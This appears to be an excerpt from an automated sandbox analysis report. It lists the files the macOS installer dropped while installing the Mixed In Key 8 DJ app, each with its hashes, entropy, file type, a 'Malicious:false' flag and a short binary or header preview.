                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.%.&.'.(.).A.B.F.M...............................................................................................................!.&.*.-.1.2.3.<.F.G.P.Q.[.\.e.n.w.........................................#.+.4.=.F.Q.\.f.g.p.z.......................................#.'./.3.7.=.A.F.I.L.P.Q.U.c.d.e.n.w.x......................................................... .!.".*.2.:.C.L.T.U.].a.g.k.p.s.t.x............U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class...................."WNS.keysZNS.objects................................... .!...o.w.c.t....TSong]EnergySegmentXCuePointZCollectionZKeySegmentXWaveform..*.+.,.-...../.0.1.2.3.4.5.6.7.8.9...;.<...>....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier........................[
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_EQiyE7
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):8831
                                                                                                    Entropy (8bit):6.497120752878308
                                                                                                    Encrypted:false
                                                                                                    MD5:C8A7912B1C6B0AB76BD978F4C05823D5
                                                                                                    SHA1:E79B5F129AAD7B98C8CB0F9592818EE5EC4AF0F2
                                                                                                    SHA-256:0BE123A5CC313409D1261F9953A54BFE35824B57502690C6B92CF60988F30A8D
                                                                                                    SHA-512:734D19362CBB6A936766A78DB8516F4C78FA0CA626C34CDC2064485FED49726459EA960F9DF3CE7239A6F7C5A3898BCCF3DF71173F46720653601BC0B28300E5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............!.".#.$.%.&.>.?.C.J.~.................................................................................$.%.-.7.B.L.V.W.`.j...u.~.................................................#.&.*.+.,.4.5.9.;.@.I.M.U.Y.].c.g.l.o.r.v.w.{.......................................................!./.0.1.2.:.D.L.M.V.Z.`.d.i.l.m.q.y.z........U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.................... WNS.keysZNS.objects...................................&.9.K.+..TSongZKeySegment]EnergySegmentZCollectionXWaveform..'.(.).*...+.,.-.../.0.1.2.3.4.5.6...8.9...;....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...a.....n...c.m........[MIKDataSong........@.A. ......D.E.F.GZ$classnameX$classes_..NSMutableDictionary..F.H.I\NSDictionaryXNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_FjxPmX
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):9863
                                                                                                    Entropy (8bit):6.500379928893154
                                                                                                    Encrypted:false
                                                                                                    MD5:B96AE6E32CA4187C66A2EAD1CF0B62DF
                                                                                                    SHA1:CD66402D20355EC5BB860B6B9975001B5F41E64C
                                                                                                    SHA-256:B65D5282293D51CB6F347326B3EA5DE9AA154D5C0B6AB324B9123B5CBDBE9C13
                                                                                                    SHA-512:42FBB650D53C4052418FA0FCCE4C51AB828376997E660FE8C1B94BFD271AA1362CC33A644D00F62B4CF2FA8CD1B4169C355E0173CC46C8CD66FC085F6D1A89DA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.%.&.'.(.).A.B.F.M.......................................................................................$.%.&.0.;.E.O.P.\.d.n.y......................................... .!.*.4.A.E.M.Q.U.Y.Z.].d.i.m.p.t.u.v.................................................................(.).-.;.<.=.>.F.P.X.Y.a.e.k.o.t.w.x.|................................................U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class...................."WNS.keysZNS.objects................................... .!...C./.W.4.<..TSong]EnergySegmentXCuePointZCollectionZKeySegmentXWaveform..*.+.,.-...../.0.1.2.3.4.5.6.7.8.9...;.<...>....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...l.....y...n.x........[MIKDataSong........C.D."......G.H.I.JZ$classname
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_FpMY7W
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):8506
                                                                                                    Entropy (8bit):6.477911087227787
                                                                                                    Encrypted:false
                                                                                                    MD5:1037106A9A3CC59EA0E9A2FC853302FD
                                                                                                    SHA1:64E4E4DB1547D433EE4356246B4E9D4F055A22E9
                                                                                                    SHA-256:C1AA5ABA052D5B4DF347E7EB5E5812D2F2F37EB4693F0FD6E91BF6DF1748A25A
                                                                                                    SHA-512:2819D4A42E4AFC1BC198FA6C7F9A1CF9030A02CF75C944667880F79E922707074AF4973F4F59DEC1208CD0519174977A2247867BB3930D6C4FF16B824C1892C4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............n.oX$versionX$objectsY$archiverT$top...............!.".#.$.%.&.>.?.C.J.x.y.z.{.|.}.~....................................................................."...-.6.?.@.J.W.`.i.s.t.}.........................................................%.).1.5.9.?.C.H.K.N.R.S.W.k.l.m.n.o.x.y..................................................... .(.).2.6.<.@.E.H.I.M.U.V.b.f.g.jU$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.................... WNS.keysZNS.objects...................................<.-.B.G..TSongZKeySegment]EnergySegmentZCollectionXWaveform..'.(.).*...+.,.-.../.0.1.2.3.4.5.6...8.9...;....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...[.....h...].g........[MIKDataSong........@.A. ......D.E.F.GZ$classnameX$classes_..NSMutableDictionary..F.H.I\NSDictionaryXNSObject.......
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_ODjLJj
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):6672
                                                                                                    Entropy (8bit):6.387532171803014
                                                                                                    Encrypted:false
                                                                                                    MD5:0768D2C34F5517DB7E445752B62D47FC
                                                                                                    SHA1:EAEB064A4E08801BA4972FBE29578C57D39F6F35
                                                                                                    SHA-256:11940B70A801CDF71302139E83DDA6E01C8C9EF13E2A31CFD0F7F2789BD25F4D
                                                                                                    SHA-512:658ADABC7DD1FA4953CE2F1563E5EA27CEE429CDCF7D9C4B15A16F202C513F6C6C8BAACF4A6E4B26081C04E880FDE28DF755B00089A7173747E194CBD1324B31
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top.......}............. .8.9.=.D.X.Y.Z.[.\.].^._.`.s.t.u.z.............................................................A.B.C.D.E.F.G.H.I.J.K.L.U.^.g.p.y.........................................................".&.+.1.5.:.=.>.B.P.Q.R.S.[.g.o.p.y.}..............U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.....y.|.............WNS.keysZNS.objects.......................#.F..WSegmentTSongZCollection..!.".#.$...%.&.'.(.).*.+.,.-.../.0...2.3...5....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...'.....2...).1........_..MIKDataSongSegment........:.;........>.?.@.AZ$classnameX$classes_..NSMutableDictionary..@.B.C\NSDictionaryXNSObject........E.N....F.G.H.I.J.K.L.M..................O.P.Q.R.S.T.U.V............. ."..VlengthZsingleNoteZconfid
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_OzYLpf
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):6793
                                                                                                    Entropy (8bit):6.373095926117128
                                                                                                    Encrypted:false
                                                                                                    MD5:0A97A00EA3B73E89730CAB60D6803AA0
                                                                                                    SHA1:3B23A98A07DD637C97277F961EDFA2C8A835E7B1
                                                                                                    SHA-256:5F0FFAD77E3362D029128FE60BCA5A9385EF1819D128DB097779222C9512BA28
                                                                                                    SHA-512:06A7E496898018F16BFAE6C7278F2503CCED5F8D63BB0288C848B033562BE68C93D9F382DB0D41B404B265586F5D203B85D964A6DBA66258082158DF222E5C04
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top..................... .8.9.=.D.X.Y.Z.[.\.].^._.`.s.t.u.z.............................................................C.D.E.F.G.H.I.J.K.L.M.N.O.X.a.j.s.|.................................................".&.'.(.-.3.7.<.B.F.K.N.O.S.a.b.c.d.l.v.~....................U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.....{.~.............WNS.keysZNS.objects.......................#.G..WSegmentTSongZCollection..!.".#.$...%.&.'.(.).*.+.,.-.../.0...2.3...5....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...'.....2...).1........_..MIKDataSongSegment........:.;........>.?.@.AZ$classnameX$classes_..NSMutableDictionary..@.B.C\NSDictionaryXNSObject........E.N....F.G.H.I.J.K.L.M..................O.P.Q.R.S.T.U.V............. ."..VlengthZsingleNoteZco
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_Qw2A46
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:data
                                                                                                    Size (bytes):21000
                                                                                                    Entropy (8bit):2.4638519202539104
                                                                                                    Encrypted:false
                                                                                                    MD5:ADCF4B139EB2D9A35226FA1D56FE60EE
                                                                                                    SHA1:542D966BA93C1FDAD4F7F3D5B00569F889D4755E
                                                                                                    SHA-256:E2D9371B315C9DAE737DA34F323AADF083C02536F4ACE7C0BDA7A13E03EDD3F5
                                                                                                    SHA-512:A7FD2280F7DEA5955997413F12EEF567D92E493ECB90E328916B16CF0276BC511B60E001E1E7D5036A49510C0D8D0A360C2591DA8AFD1EE25505D5B72F24F970
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: momv2$[]77y234078nf3490324nfauh7kf77y7pjfauy72-918reiaprehuhfrew..N$..>.......-8...@...6...............H...........A...............K..N.....................................................C.o.l.l.e.c.t.i.o.n.........N.a.m.e.........C.u.e.P.o.i.n.t.........E.n.e.r.g.y.S.e.g.m.e.n.t...........K.e.y.S.e.g.m.e.n.t.........7.A.........S.o.n.g.........A.r.t.i.s.t.........0...........W.a.v.e.f.o.r.m............K........................................................PF_DEFAULT_CONFIGURATION_NAME...........................Collection..............................MIKDataCollection...............................songs...........................index...........................NSNumber................................isLibrary...............................name............................NSString................................filter.........................._opt............................_ent............................_pk.............................CuePoint................................MIKDataC
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_XQvry0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):9154
                                                                                                    Entropy (8bit):6.475968492892076
                                                                                                    Encrypted:false
                                                                                                    MD5:0F63727FC7E1DD9BD7916B3942F2E9E6
                                                                                                    SHA1:0AB1FEB82A16CBE9A4E775B52D0A4EE69526FD1A
                                                                                                    SHA-256:9D0240475523C206C1401430F7B7FD7604DC8F5AEC059447CF4431958C625C2E
                                                                                                    SHA-512:32439286B40AB6CCAC5E38C04B97DDE96AC6D1A8708E4A1188EFC7603ACCA8C0A421A8934FC085490A54A229059CAD1A9B7F3706AA4145EA49F067A134436C16
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............!.".#.$.%.&.>.?.C.J......................................................................................... .*.+.7.?.I.T.^.h.i.s.t.}....................................... .(.,.0.4.5.8.?.D.H.K.O.P.Q.Z.^.`.e.n.r.z.~...............................................................&./.8.A.B.F.T.U.V.W._.i.q.r.z.~........................U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.................... WNS.keysZNS.objects...................................-.>.R.2..TSongZKeySegment]EnergySegmentZCollectionXWaveform..'.(.).*...+.,.-.../.0.1.2.3.4.5.6...8.9...;....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...g.....t...i.s........[MIKDataSong........@.A. ......D.E.F.GZ$classnameX$classes_..NSMutableDictionary..F.H.I\NSDi
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_hFwXEw
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):2257
                                                                                                    Entropy (8bit):7.277383153742723
                                                                                                    Encrypted:false
                                                                                                    MD5:D04C43234BE03DD6504B394F7FEB2317
                                                                                                    SHA1:605864435C167EAAED1A5D40DEEF191A72F5B2A9
                                                                                                    SHA-256:4180847E8510DD6E44544D1AA4E3A4D5B85E35AFCB323BF2235C631444A439D5
                                                                                                    SHA-512:5DA649C5ED031DBD43912886C96B76458E74E8B4718B4EAD303842C74F61182DB075ADE8C8A151F6847525978B51ECB3246F2B41EEFDF1536BFEC8B7AD14D56E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00....T_."NSManagedObjectModel_VersionHashes_.'NSManagedObjectModel_CurrentVersionName............ *2:?HP[DataModel 6[DataModel 3[DataModel 8_..DataModel 3-mashup[DataModel 5[DataModel 2[DataModel 7[DataModel 4YDataModel...........TSongZKeySegment]EnergySegmentZCollectionXWaveformO. .........z..s.T3=.c..>.#...N..a.O. .....h..E*..x.<...U.g..oa...n..9O. qC....a.6.../.,:..-.9.......F.`.O. F|.C..?..(..p+.l.#9.ez5G.....7).O. ..sv.......UQ.3/..CS/....N+h...............ZKeySegment]EnergySegmentO. ............/.....A......K.k..0.O. .....h..E*..x.<...U.g..oa...n..9O. qC....a.6.../.,:..-.9.......F.`.O. F|.C..?..(..p+.l.#9.ez5G.....7).O. ..sv.......UQ.3/..CS/....N+h......!".#.$%&'()]EnergySegmentXCuePointZKeySegmentO. ........vO...t.......I..~.o6...0O. qC....a.6.../.,:..-.9.......F.`.O. ..F......R...].I..$5.^Q........fO. F|.C..?..(..p+.l.#9.ez5G.....7).O. .....h..E*..x.<...U.g..oa...n..9O. ..sv.......UQ.3/..CS/....N+h......+,..-./01ZKeySegment]EnergySegmentO. y..lp...c..!...$Vk....:Qb.X.)..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_hiPuWJ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):9051
                                                                                                    Entropy (8bit):6.473878113099952
                                                                                                    Encrypted:false
                                                                                                    MD5:72A2E29DB5F0F88C0AF642FF24447509
                                                                                                    SHA1:35DC52C2A2251732E1C5B7CD875CA84042FD5F89
                                                                                                    SHA-256:B8A3092AE73131A0204A3B2DEC3ABE484A98A6E48D79B6252D2BE714710DA1E2
                                                                                                    SHA-512:18F712F1AEDB53D7F493213D8F1ABE9248E43061C9F13CB5CCBFD059A7844EDC5C3B4A0431F43AEE15FF2BE93A4D643C1A199AAF286412823841DF61A05A03FC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............!.".#.$.%.&.>.?.C.J.......................................................................................*.+.3.=.H.R.\.].g.h.q.z...........................................#.'.(.+.2.7.;.>.B.C.D.L.M.Q.S.X.a.e.m.q.u.{.............................................................".+.4.5.9.G.H.I.J.R.\.d.e.n.r.x.|....................U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.................... WNS.keysZNS.objects...................................(.;.O.-..TSongZKeySegment]EnergySegmentZCollectionXWaveform..'.(.).*...+.,.-.../.0.1.2.3.4.5.6...8.9...;....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...e.....r...g.q........[MIKDataSong........@.A. ......D.E.F.GZ$classnameX$classes_..NSMutableDictionary..F.H.I\NSDictio
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/_CodeSignature/.BC.T_RlSptd
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):9604
                                                                                                    Entropy (8bit):5.307642349842789
                                                                                                    Encrypted:false
                                                                                                    MD5:013A1D736153C720DBD9416EEFC9B45F
                                                                                                    SHA1:AD4CD6B16EB7C7B168324C150C8841D119CDB283
                                                                                                    SHA-256:F062B8F3F820D2EB403C9C93D8F67CDE50AEC52E506DA23E4A707D8AE2113DC9
                                                                                                    SHA-512:216CABCF0E60692754BF47B5B6060A47941CF4AA99B1234B054B836AB39D81B1CC88762E75124A50BFC5C7BC688FA3FCAF7209ED573CD7A5EC50112D4F665D7E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/3to4.cdm</key>...<data>...0uVK3wsBWMprYhcSrSM+d3S3UxU=...</data>...<key>Resources/DataModel.momd/DataModel 2.mom</key>...<data>...OyOpigfdY3yXJ3+WHt+iyKg157E=...</data>...<key>Resources/DataModel.momd/DataModel 3-mashup.mom</key>...<data>...LtJGZyz/7JVqfMjED7UxkuYqOJg=...</data>...<key>Resources/DataModel.momd/DataModel 3.mom</key>...<data>...ZOTk2xVH1DPuQ1Yka06dTwVaIuk=...</data>...<key>Resources/DataModel.momd/DataModel 4.mom</key>...<data>...55tfEpqte5jIyw+VkoGO5exK8PI=...</data>...<key>Resources/DataModel.momd/DataModel 5.mom</key>...<data>...NdxSwqIlFzLhxbfNh1yoQEL9X4k=...</data>...<key>Resources/DataModel.momd/DataModel 6.mom</key>...<data>...CrH+uCoWy+mk53W1LQpO5pUm/Ro=...</data>...<key>Resources/DataModel.momd/DataModel 7.mom</key>...<data>...zWZALSA1XsW7hgtrmXUAG19B5
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/.BC.T_QaupMP
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):689568
                                                                                                    Entropy (8bit):5.917331347258735
                                                                                                    Encrypted:false
                                                                                                    MD5:0E43CF9FBD333878E318947B8E54D7B2
                                                                                                    SHA1:AC4BE20E5797E606834C315B74C63E6A7903CC0E
                                                                                                    SHA-256:9285FECC8E4F950DD2FE8391330BE347D081511A96664F870DB2C8A79BC2626A
                                                                                                    SHA-512:1B8A064A67FF241DFC00B3936EEF20828443AB07E7515A7A3F0C07D825120063E6DA470221631A8BBEF9829075B73B8A081CE3DE43F9EEB9110F2297A56A0C27
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........................................__TEXT..........................................................__text..........__TEXT..........................................................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..................D.......................................__objc_methname.__TEXT...................m......................................__cstring.......__TEXT...........j.......].......j..............................__objc_classname__TEXT..........................................................__objc_methtype.__TEXT..................5.......................................__const.........__TEXT..........................................................__gcc_except_tab__TEXT..........................................................__unwind_info...__TEXT..........................................................__eh_frame......__TEXT..................H...........................................8...__DATA..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_1dXsoL
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1476
                                                                                                    Entropy (8bit):5.028574377010233
                                                                                                    Encrypted:false
                                                                                                    MD5:00FDCE29ED08960C5F910248887DA01E
                                                                                                    SHA1:4DE6A03C36BE1F1895181A13C4628E09CCF77A37
                                                                                                    SHA-256:EE6DFE9EAD7FC4045EA8850175297237FEE884DDEA0A17F003BD85557F7CF46C
                                                                                                    SHA-512:1531C4CBE9A6D6B0FD2B7DA30DA52075470E263D4C918012AEFCC61DEDC1FDEE19FB8BC1E7FE95F5C8D5DB96899763BF2E5D31394546103183CC6E0CD513A357
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIControlChangeEvent.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/3/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * Control change events are typically sent when a controller value changes. . * Controllers include devices such as pedals and levers.. *. * This event is the counterpart to MIKMIDIControlChangeCommand in the context. * of sequences/MIDI Files.. */.@interface MIKMIDIControlChangeEvent : MIKMIDIChannelEvent../**. * The MIDI controller number for the event.. * Only values from 0-127 are valid.. */.@property (nonatomic, readonly) NSUInteger controllerNumber;../**. * The value of the controller specified by controllerNumber.. * Only values from 0-127 are valid.. */.@property (nonatomic, readonly) NSUInteger controllerValue;..@end../**. * The mutable counter part of MIKMIDIControlChangeEvent. */.@interface MIKMutableMIDIControlCha
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_2Faiy8
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):2698
                                                                                                    Entropy (8bit):4.871649472951399
                                                                                                    Encrypted:false
                                                                                                    MD5:2D70F2E51ABA5969EE960B60A6F4D0C1
                                                                                                    SHA1:02475998FBC97B5DE71CC9386ADB5B82F6E6522F
                                                                                                    SHA-256:AEDBECF612B85F87E553C16C1BE13C65BE7E2B87D94B2C0A5DE9C32D43814704
                                                                                                    SHA-512:A7648BE907DCD606254524A5339E439FCEDC589E5B945019FC4F9D9B840B45AB214B0F4895F291C2400EFF997378E0C68605F2047CFC5F19A403727AD17FFC19
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDI.h.// MIKMIDI.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//../** Umbrella header for MIKMIDI public interface. */..// Core MIDI object wrapper.#import "MIKMIDIObject.h"..// MIDI port.#import "MIKMIDIPort.h".#import "MIKMIDIInputPort.h".#import "MIKMIDIOutputPort.h"..// MIDI Device support.#import "MIKMIDIDevice.h".#import "MIKMIDIDeviceManager.h".#import "MIKMIDIConnectionManager.h"..#import "MIKMIDIEntity.h"..// Endpoints.#import "MIKMIDIEndpoint.h".#import "MIKMIDIDestinationEndpoint.h".#import "MIKMIDISourceEndpoint.h".#import "MIKMIDIClientDestinationEndpoint.h".#import "MIKMIDIClientSourceEndpoint.h"..// MIDI Commands/Messages.#import "MIKMIDICommand.h".#import "MIKMIDIChannelVoiceCommand.h".#import "MIKMIDINoteCommand.h".#import "MIKMIDIChannelPressureCommand.h".#import "MIKMIDIControlChangeCommand.h".#import "MIKMIDIProgramChangeCommand.h".#import "MIKMIDIPitchBendChangeCommand.h".#import "MIKMIDINoteOnComm
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_42Cryz
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):1301
                                                                                                    Entropy (8bit):4.942661122591586
                                                                                                    Encrypted:false
                                                                                                    MD5:8EFD03FB97FE422192E6BA39D5350C0C
                                                                                                    SHA1:B1C418E9170C2F389F2D27F09DC4D03B9CF5D332
                                                                                                    SHA-256:49EB33224DB8BB87693D78F6A820C52F464A4742E4539BA3D5615A6498268675
                                                                                                    SHA-512:E920061C88B1F6AF97E4701B9F9EC0D13C0DA335C559FA290A0A7855B1F72708237BDE386EF387D3B5AF23A311886088E31D113AEDDB59FD301E48C85690E672
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIPolyphonicKeyPressureCommand.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/12/15..// Copyright .. 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelVoiceCommand.h"../**. * A MIDI polyphonic key pressure message. This message is most often sent by pressing . * down on the key after it "bottoms out".. */.@interface MIKMIDIPolyphonicKeyPressureCommand : MIKMIDIChannelVoiceCommand../// The note number for the message. In the range 0-127..@property (nonatomic, readonly) NSUInteger note;../// Key pressure of the polyphonic key pressure message. In the range 0-127..@property (nonatomic, readonly) NSUInteger pressure;..@end../**. * The mutable counterpart to MIKMIDIPolyphonicKeyPressureCommand.. */.@interface MIKMutableMIDIPolyphonicKeyPressureCommand : MIKMIDIPolyphonicKeyPressureCommand../// The note number for the message. In the range 0-127..@property (nonatomic, readwrite) NSUInteger note;../// Key pressure of the polyphonic key pressure message. I
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_5NvGXt
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):3488
                                                                                                    Entropy (8bit):4.956251009216124
                                                                                                    Encrypted:false
